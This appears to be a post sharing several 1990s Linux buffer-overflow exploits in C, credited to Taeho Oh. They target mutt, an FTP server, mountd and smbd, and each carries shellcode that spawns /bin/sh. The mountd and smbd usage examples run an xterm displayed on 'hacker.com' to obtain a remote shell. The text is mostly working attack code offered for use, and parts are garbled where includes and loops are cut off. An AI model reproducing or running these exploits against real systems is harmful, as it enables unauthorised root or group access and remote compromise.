Hi! I have some exploit codes. begin mutt-ex.c ---------------------------------------- /* Mutt exploit code for x86 linux Local user can gain mail group access. Tested redhat linux : 5.0 Tested mutt : 0.88 This program is only for demonstrative use only. USE IT AT YOUR OWN RISK! Programmed by Taeho Oh 1999/04/25 Taeho Oh ( ohhara@postech.edu ) http://postech.edu/~ohhara PLUS ( Postech Laboratory for Unix Security ) http://postech.edu/plus PosLUG ( Postech Linux User Group ) http://postech.edu/group/poslug */ #include #include #define OFFSET -500 #define RET_POSITION 234 #define RANGE 20 #define NOP 0x90 #define COMMAND "/bin/sh" char shellcode[]= "\xeb\x29" /* jmp 0x29 */ "\x31\xc0" /* xorl %eax,%eax */ "\x31\xdb" /* xorl %ebx,%ebx */ "\xb3\x0c" /* movb $0xc,%bl */ "\xb0\x2e" /* movb $0x2e,%al */ "\xcd\x80" /* int $0x80 */ "\x5e" /* popl %esi */ "\x89\x76\x08" /* movl %esi,0x8(%esi) */ "\x31\xc0" /* xorl %eax,%eax */ "\x88\x46\x07" /* movb %eax,0x7(%esi) */ "\x89\x46\x0c" /* movl %eax,0xc(%esi) */ "\xb0\x0b" /* movb $0xb,%al */ "\x89\xf3" /* movl %esi,%ebx */ "\x8d\x4e\x08" /* leal 0x8(%esi),%ecx */ "\x8d\x56\x0c" /* leal 0xc(%esi),%edx */ "\xcd\x80" /* int $0x80 */ "\x31\xdb" /* xorl %ebx,%ebx */ "\x89\xd8" /* movl %ebx,%eax */ "\x40" /* inc %eax */ "\xcd\x80" /* int $0x80 */ "\xe8\xd2\xff\xff\xff" /* call -0x24 */ "/bin/sh"; /* .string \"/bin/sh\" */ unsigned long get_sp(void) { __asm__("movl %esp,%eax"); } void main(int argc,char **argv) { char buff[RET_POSITION+RANGE+1],*ptr; long *addr_ptr,addr; unsigned long sp; int offset=OFFSET,bsize=RET_POSITION+RANGE+1; int i; printf("Taeho Oh ( ohhara@postech.edu ) http://postech.edu/~ohhara\n"); printf("PLUS ( Postech Laboratory for Unix Security ) http://postech.edu/plus\n"); printf("PosLUG ( Postech Linux User Group ) http://postech.edu/group/poslug\n\n"); if(argc>1) offset+=atoi(argv[1]); sp=get_sp(); addr=sp-offset; ptr=buff; addr_ptr=(long*)ptr; for(i=0;i #include #include #define OFFSET 100 #define RET_POSITION 1024 #define RANGE 20 #define NOP 0x90 char shellcode[1024]= "\xeb\x31" /* jmp 0x31 */ "\x31\xc0" /* xorl %eax,%eax */ "\x31\xdb" /* xorl %ebx,%ebx */ "\xb0\x17" /* movb $0x17,%al */ "\xcd\x80" /* int $0x80 */ "\x31\xc0" /* xorl %eax,%eax */ "\x31\xdb" /* xorl %ebx,%ebx */ "\xb0\x17" /* movb $0x17,%al */ "\x04\x17" /* addb $0x17,%al */ "\xcd\x80" /* int $0x80 */ "\x5e" /* popl %esi */ "\x89\x76\x08" /* movl %esi,0x8(%esi) */ "\x31\xc0" /* xorl %eax,%eax */ "\x88\x46\x07" /* movb %eax,0x7(%esi) */ "\x89\x46\x0c" /* movl %eax,0xc(%esi) */ "\xb0\x0b" /* movb $0xb,%al */ "\x89\xf3" /* movl %esi,%ebx */ "\x8d\x4e\x08" /* leal 0x8(%esi),%ecx */ "\x8d\x56\x0c" /* leal 0xc(%esi),%edx */ "\xcd\x80" /* int $0x80 */ "\x31\xdb" /* xorl %ebx,%ebx */ "\x89\xd8" /* movl %ebx,%eax */ "\x40" /* inc %eax */ "\xcd\x80" /* int $0x80 */ "\xe8\xca\xff\xff\xff" /* call -0x36 */ "/bin/sh"; /* .string \"/bin/sh\" */ unsigned long get_esp(void) { __asm__("movl %esp,%eax"); } void main(int argc,char **argv) { char buff[RET_POSITION+RANGE+1],*ptr; long *addr_ptr,addr; unsigned long sp; int offset=OFFSET,bsize=RET_POSITION+RANGE+1; int i; printf("Taeho Oh ( ohhara@postech.edu ) http://postech.edu/~ohhara\n"); printf("PLUS ( Postech Laboratory for Unix Security ) http://postech.edu/plus\n"); printf("PosLUG ( Postech Linux User Group ) http://postech.edu/group/poslug\n\n"); if(argc>1) offset+=atoi(argv[1]); sp=get_esp(); addr=sp-offset; ptr=buff; addr_ptr=(long*)ptr; for(i=0;i #include #include #include #include #include #include #include #define RET 0xbfffa92d #define NOP 0x90 void logintoftp(int sockfd,char *userid,char *passwd); void sh(int sockfd); void mkd(int sockfd,char *dir); void cwd(int sockfd,char *dir); void dele(int sockfd,char *dir); long getip(char *name); void mkpdir(int i,char *pdir); char shellcode[]= "\x31\xc0" /* xorl %eax,%eax */ "\x31\xdb" /* xorl %ebx,%ebx */ "\xb0\x17" /* movb $0x17,%al */ "\xcd\x80" /* int $0x80 */ "\xeb\x4f" /* jmp 0x4f */ "\x31\xc0" /* xorl %eax,%eax */ "\x31\xc9" /* xorl %ecx,%ecx */ "\x5e" /* popl %esi */ "\xb0\x27" /* movb $0x27,%al */ "\x8d\x5e\x05" /* leal 0x5(%esi),%ebx */ "\xfe\xc5" /* incb %ch */ "\xb1\xed" /* movb $0xed,%cl */ "\xcd\x80" /* int $0x80 */ "\x31\xc0" /* xorl %eax,%eax */ "\x8d\x5e\x05" /* leal 0x5(%esi),%ebx */ "\xb0\x3d" /* movb $0x3d,%al */ "\xcd\x80" /* int $0x80 */ "\x31\xc0" /* xorl %eax,%eax */ "\xbb\xd2\xd1\xd0\xff" /* movl $0xffd0d1d2,%ebx */ "\xf7\xdb" /* negl %ebx */ "\x31\xc9" /* xorl %ecx,%ecx */ "\xb1\x10" /* movb $0x10,%cl */ "\x56" /* pushl %esi */ "\x01\xce" /* addl %ecx,%esi */ "\x89\x1e" /* movl %ebx,(%esi) */ "\x83\xc6\x03" /* addl %0x3,%esi */ "\xe0\xf9" /* loopne -0x7 */ "\x5e" /* popl %esi */ "\xb0\x3d" /* movb $0x3d,%al */ "\x8d\x5e\x10" /* leal 0x10(%esi),%ebx */ "\xcd\x80" /* int $0x80 */ "\x31\xc0" /* xorl %eax,%eax */ "\x88\x46\x07" /* movb %al,0x7(%esi) */ "\x89\x76\x08" /* movl %esi,0x8(%esi) */ "\x89\x46\x0c" /* movl %eax,0xc(%esi) */ "\xb0\x0b" /* movb $0xb,%al */ "\x89\xf3" /* movl %esi,%ebx */ "\x8d\x4e\x08" /* leal 0x8(%esi),%ecx */ "\x8d\x56\x0c" /* leal 0xc(%esi),%edx */ "\xcd\x80" /* int $0x80 */ "\xe8\xac\xff\xff\xff"; /* call -0x54 */ int main(int argc,char **argv) { int sockfd; char sendln[1024],recvln[4048]; int len,offset=0,i; int pos; char pdir[256]; char buff[256],*ptr; long *addr_ptr,addr; char userid[128],passwd[128]; struct sockaddr_in cli; printf("Taeho Oh ( ohhara@postech.edu ) http://postech.edu/~ohhara\n"); printf("PLUS ( Postech Laboratory for Unix Security ) http://postech.edu/plus\n"); printf("PosLUG ( Postech Linux User Group ) http://postech.edu/group/poslug\n\n"); if(argc<5){ printf("\nusage: %s host userid password dir [offset]\n\n", argv[0]); printf("\n", argv[0]); exit(0); } strcpy(userid,argv[2]); strcpy(passwd,argv[3]); if(argc>5) offset=atoi(argv[5]); bzero(&cli,sizeof(cli)); bzero(recvln,sizeof(recvln)); bzero(sendln,sizeof(sendln)); cli.sin_family=AF_INET; cli.sin_port=htons(21); cli.sin_addr.s_addr=getip(argv[1]); if((sockfd=socket(AF_INET,SOCK_STREAM,0))<0) exit(0); if(connect(sockfd,(struct sockaddr *)&cli,sizeof(cli))<0) exit(0); while((len=read(sockfd,recvln,sizeof(recvln)))>0) { recvln[len]='\0'; if(strchr(recvln,'\n')!=NULL) break; } logintoftp(sockfd,userid,passwd); pos=strlen(argv[4]); cwd(sockfd,argv[4]); while(pos<504) { mkpdir(255,pdir); mkd(sockfd,pdir); cwd(sockfd,pdir); pos+=256; } mkpdir(759-pos,pdir); mkd(sockfd,pdir); cwd(sockfd,pdir); for(i=0;i<255;i++) buff[i]=NOP; buff[i]='\0'; ptr=buff+255-strlen(shellcode); for(i=0;i0) { rcv[n]=0; if(strchr(rcv,'\n')!=NULL) break; } return; } void cwd(int sockfd,char *dir) { char snd[512],rcv[1024]; char blah[1024],*p; int n; struct timeval tv; fd_set fds; bzero(&tv,sizeof(tv)); tv.tv_usec=50; bzero(blah,sizeof(blah)); p=blah; for(n=0;n0) { rcv[n]=0; if(strchr(rcv,'\n')!=NULL) break; } return; } void dele(int sockfd,char *dir) { char snd[512],rcv[1024]; char blah[1024],*p; int n; struct timeval tv; fd_set fds; bzero(&tv,sizeof(tv)); tv.tv_usec=50; bzero(blah,sizeof(blah)); p=blah; for(n=0;n0) { rcv[n]=0; if(strchr(rcv,'\n')!=NULL) break; } return; } void ftpcommand(int sockfd,char *command) { char snd[1024], rcv[1024]; int n; memset(snd,'\0',1024); strcpy(snd,command); write(sockfd,snd,strlen(snd)); while((n=read(sockfd,rcv,sizeof(rcv)))>0) { rcv[n]=0; if(strchr(rcv,'\n')!=NULL) break; } } void logintoftp(int sockfd,char *userid,char *passwd) { char snd[1024],rcv[1024]; int n; memset(snd,'\0',1024); sprintf(snd,"USER %s\r\n",userid); write(sockfd,snd,strlen(snd)); while((n=read(sockfd,rcv,sizeof(rcv)))>0) { rcv[n]=0; if(strchr(rcv,'\n')!=NULL) break; } memset(snd,'\0',1024); sprintf(snd,"PASS %s\r\n",passwd); write(sockfd,snd,strlen(snd)); while((n=read(sockfd,rcv,sizeof(rcv)))>0) { rcv[n]=0; if(strchr(rcv,'\n')!=NULL) break; } return; } void sh(int sockfd) { char snd[1024],rcv[1024]; fd_set rset; int maxfd,n; while(1) { FD_SET(fileno(stdin),&rset); FD_SET(sockfd,&rset); if(fileno(stdin)>sockfd) maxfd=fileno(stdin)+1; else maxfd=sockfd+1; select(maxfd,&rset,NULL,NULL,NULL); if(FD_ISSET(fileno(stdin),&rset)) { bzero(snd,sizeof(snd)); fgets(snd,sizeof(snd)-2,stdin); write(sockfd,snd,strlen(snd)); } if(FD_ISSET(sockfd, &rset)) { bzero(rcv, sizeof(rcv)); if((n=read(sockfd,rcv,sizeof(rcv)))==0) exit(0); if(n<0) exit(-1); fputs(rcv,stdout); } } } long getip(char *name) { struct hostent *hp; long ip; if((ip=inet_addr(name))==-1) { if ((hp=gethostbyname(name))==NULL) { fprintf(stderr,"Can't resolve host.\n"); exit (1); } memcpy(&ip,(hp->h_addr),4); } return ip; } void mkpdir(int size,char *pdir) { int i; for(i=0;i [offset] Warning : This program can crash mountd. This program is only for demonstrative use only. USE IT AT YOUR OWN RISK! Programmed by Taeho Oh 1998/10/19 Taeho Oh ( ohhara@postech.edu ) http://postech.edu/~ohhara PLUS ( Postech Laboratory for Unix Security ) http://postech.edu/plus PosLUG ( Postech Linux User Group ) http://postech.edu/group/poslug */ #include #include #define OFFSET 0 #define RET_POSITION 984 #define RANGE 20 #define NOP 0x90 char shellcode[400]= "\xeb\x35" /* jmp 0x35 */ "\x5e" /* popl %esi */ "\x89\x76\x0b" /* movl %esi,0xb(%esi) */ "\x89\xf0" /* movl %esi,%eax */ "\x83\xc0\x08" /* addl $0x8,%eax */ "\x89\x46\x0b" /* movl %eax,0xb(%esi) */ "\x89\xf0" /* movl %esi,%eax */ "\x83\xc0\x0b" /* addl $0xb,%eax */ "\x89\x46\x0b" /* movl %eax,0xb(%esi) */ "\x31\xc0" /* xorl %eax,%eax */ "\x88\x46\x07" /* movb %eax,0x7(%esi) */ "\x88\x46\x0a" /* movb %eax,0xa(%esi) */ "\x88\x46\x0b" /* movb %eax,0xb(%esi) */ "\x89\x46\x0b" /* movl %eax,0xb(%esi) */ "\xb0\x0b" /* movb $0xb,%al */ "\x89\xf3" /* movl %esi,%ebx */ "\x8d\x4e\x0b" /* leal 0xb(%esi),%ecx */ "\x8d\x56\x0b" /* leal 0xb(%esi),%edx */ "\xcd\x80" /* int 0x80 */ "\x31\xdb" /* xorl %ebx,%ebx */ "\x89\xd8" /* movl %ebx,%eax */ "\x40" /* inc %eax */ "\xcd\x80" /* int 0x80 */ "\xe8\xc6\xff\xff\xff" /* call -0x3a */ "/bin/sh -c "; /* .string "/bin/sh -c "*/ char command[400]; void usage() { printf("Warning : This program can crash mountd\n"); printf("Usage: mountd-ex [offset]\n"); printf("ex) mountd-ex ohhara.target.com \"/usr/X11R6/bin/xterm -display hacker.com:0\"\n"); } void main(int argc,char **argv) { char buff[RET_POSITION+RANGE+1],*ptr; char mntarg[RET_POSITION+RANGE+300]; long *addr_ptr,addr; unsigned long sp; int offset=OFFSET,bsize=RET_POSITION+RANGE+1; int i; printf("Taeho Oh ( ohhara@postech.edu ) http://postech.edu/~ohhara\n"); printf("PLUS ( Postech Laboratory for Unix Security ) http://postech.edu/plus\n"); printf("PosLUG ( Postech Linux User Group ) http://postech.edu/group/poslug\n\n"); if(argc<3) { usage(); exit(1); } if(argc>2) { strcpy(mntarg,argv[1]); strcpy(command,argv[2]); } if(argc>3) offset=atoi(argv[3]); shellcode[5]=(shellcode[5]+strlen(command))/4*4+4; shellcode[13]=(shellcode[13]+strlen(command))/4*4+8; shellcode[21]=(shellcode[21]+strlen(command))/4*4+12; shellcode[32]=(shellcode[32]+strlen(command)); shellcode[35]=(shellcode[35]+strlen(command))/4*4+16; shellcode[42]=(shellcode[42]+strlen(command))/4*4+4; shellcode[45]=(shellcode[45]+strlen(command))/4*4+16; strcat(shellcode,command); sp=0xbffff113; addr=sp-offset; ptr=buff+1; addr_ptr=(long*)ptr; for(i=0;i [offset] This program is only for demonstrative use only. USE IT AT YOUR OWN RISK! Programmed by Taeho Oh 1998/10/15 Taeho Oh ( ohhara@postech.edu ) http://postech.edu/~ohhara PLUS ( Postech Laboratory for Unix Security ) http://postech.edu/plus PosLUG ( Postech Linux User Group ) http://postech.edu/group/poslug */ #include #include #define OFFSET 0 #define RET_POSITION 3060 #define RANGE 20 #define NOP 0x90 char shellcode[400]= "\xeb\x35" /* jmp 0x35 */ "\x5e" /* popl %esi */ "\x89\x76\x0b" /* movl %esi,0xb(%esi) */ "\x89\xf0" /* movl %esi,%eax */ "\x83\xc0\x08" /* addl $0x8,%eax */ "\x89\x46\x0b" /* movl %eax,0xb(%esi) */ "\x89\xf0" /* movl %esi,%eax */ "\x83\xc0\x0b" /* addl $0xb,%eax */ "\x89\x46\x0b" /* movl %eax,0xb(%esi) */ "\x31\xc0" /* xorl %eax,%eax */ "\x88\x46\x07" /* movb %eax,0x7(%esi) */ "\x88\x46\x0a" /* movb %eax,0xa(%esi) */ "\x88\x46\x0b" /* movb %eax,0xb(%esi) */ "\x89\x46\x0b" /* movl %eax,0xb(%esi) */ "\xb0\x0b" /* movb $0xb,%al */ "\x89\xf3" /* movl %esi,%ebx */ "\x8d\x4e\x0b" /* leal 0xb(%esi),%ecx */ "\x8d\x56\x0b" /* leal 0xb(%esi),%edx */ "\xcd\x80" /* int 0x80 */ "\x31\xdb" /* xorl %ebx,%ebx */ "\x89\xd8" /* movl %ebx,%eax */ "\x40" /* inc %eax */ "\xcd\x80" /* int 0x80 */ "\xe8\xc6\xff\xff\xff" /* call -0x3a */ "/bin/sh -c "; /* .string "/bin/sh -c "*/ char command[400]; void usage() { printf("Usage: smbd-ex [offset]\n"); printf("ex) smbd-ex ohhara.target.com OHHARA \"/usr/X11R6/bin/xterm -display hacker.com:0\"\n"); } void main(int argc,char **argv) { char buffer[256]; char ip[256]; char buff[RET_POSITION+RANGE+1],*ptr; long *addr_ptr,addr; unsigned long sp; int offset=OFFSET,bsize=RET_POSITION+RANGE+1; int i; printf("Taeho Oh ( ohhara@postech.edu ) http://postech.edu/~ohhara\n"); printf("PLUS ( Postech Laboratory for Unix Security ) http://postech.edu/plus\n"); printf("PosLUG ( Postech Linux User Group ) http://postech.edu/group/poslug\n\n"); if(argc<4) { usage(); exit(1); } if(argc>3) { strcpy(ip,argv[1]); sprintf(buffer,"\\\\\\\\%s\\\\IPC$",argv[2]); strcpy(command,argv[3]); } if(argc>4) offset=atoi(argv[4]); shellcode[5]=(shellcode[5]+strlen(command))/4*4+4; shellcode[13]=(shellcode[13]+strlen(command))/4*4+8; shellcode[21]=(shellcode[21]+strlen(command))/4*4+12; shellcode[32]=(shellcode[32]+strlen(command)); shellcode[35]=(shellcode[35]+strlen(command))/4*4+16; shellcode[42]=(shellcode[42]+strlen(command))/4*4+4; shellcode[45]=(shellcode[45]+strlen(command))/4*4+16; strcat(shellcode,command); sp=0xbffffb11; addr=sp-offset; ptr=buff; addr_ptr=(long*)ptr; for(i=0;i